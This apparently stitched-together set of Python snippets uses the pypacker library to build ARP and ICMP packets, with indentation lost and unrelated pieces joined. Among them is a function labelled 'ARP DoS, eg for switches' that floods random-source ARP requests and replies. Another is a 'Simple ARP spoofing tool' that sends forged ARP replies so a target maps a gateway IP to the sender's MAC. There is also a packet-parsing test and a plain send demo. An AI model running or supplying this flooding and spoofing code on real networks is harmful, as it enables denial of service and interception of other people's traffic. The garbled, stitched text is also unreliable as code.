def arp_cb(pargs):
"""ARP DoS, eg for switches"""
#logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REQUEST)
pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REPLY)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
# request from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_req.src = mac
pkt_arp_req.arp.sha = mac
pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_req.bin())
# response from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_resp.src = mac
pkt_arp_resp.arp.sha = mac
pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_resp.bin())
psock.close()
def test_arp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
broadcast_mac = "ff:ff:ff:ff:ff:ff"
src_ip = "21.53.78.255"
target_ip = "10.0.0.255"
bpf_filter = "arp"
display_filter = "arp"
expected_output = {
"eth.src": src_mac,
"eth.dst": broadcast_mac,
"arp.src.hw_mac": src_mac,
"arp.src.proto_ipv4": src_ip,
"arp.dst.hw_mac": broadcast_mac,
"arp.dst.proto_ipv4": target_ip,
}
packet = ethernet.Ethernet(src_s=src_mac, dst_s=broadcast_mac) + arp.ARP(
sha_s=src_mac, spa_s=src_ip, tha_s=broadcast_mac, tpa_s=target_ip
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
import socket
import pypacker.pypacker as pypacker
from pypacker.pypacker import Packet
from pypacker import psocket
from pypacker.layer12 import arp, ethernet, ieee80211, prism
from pypacker.layer3 import ip, icmp
psock = psocket.SocketHndl(iface_name="lo0",
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=10)
# send ARP request
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
"""Simple ARP spoofing tool."""
from pypacker.layer12 import arp, ethernet
from pypacker import psocket
import time
# interface to listen on
IFACE = "wlan0"
# our real MAC
MAC_SRC = "00:11:22:33:44:55"
# IP to be spoofed
IP_SRC = "192.168.178.1"
# destination address
MAC_DST = "00:11:22:33:44:56"
IP_DST = "192.168.178.27"
#
# spoof ARP response
#
arp_spoof = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC, type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s=MAC_SRC, spa_s=IP_SRC, tha_s=MAC_DST, tpa_s=IP_DST, op=arp.ARP_OP_REPLY)
psock = psocket.SocketHndl(iface_name=IFACE, timeout=600)
for a in range(10):
print("sending ARP response")
psock.send(arp_spoof.bin())
time.sleep(1)
psock.close()
def generate_arp_packet(src_ip: str, target_ip: str) -> Packet:
src_mac = "00:00:00:12:34:ff"
broadcast_mac = "ff:ff:ff:ff:ff:ff"
return ethernet.Ethernet(src_s=src_mac, dst_s=broadcast_mac) + arp.ARP(
sha_s=src_mac, spa_s=src_ip, tha_s=broadcast_mac, tpa_s=target_ip)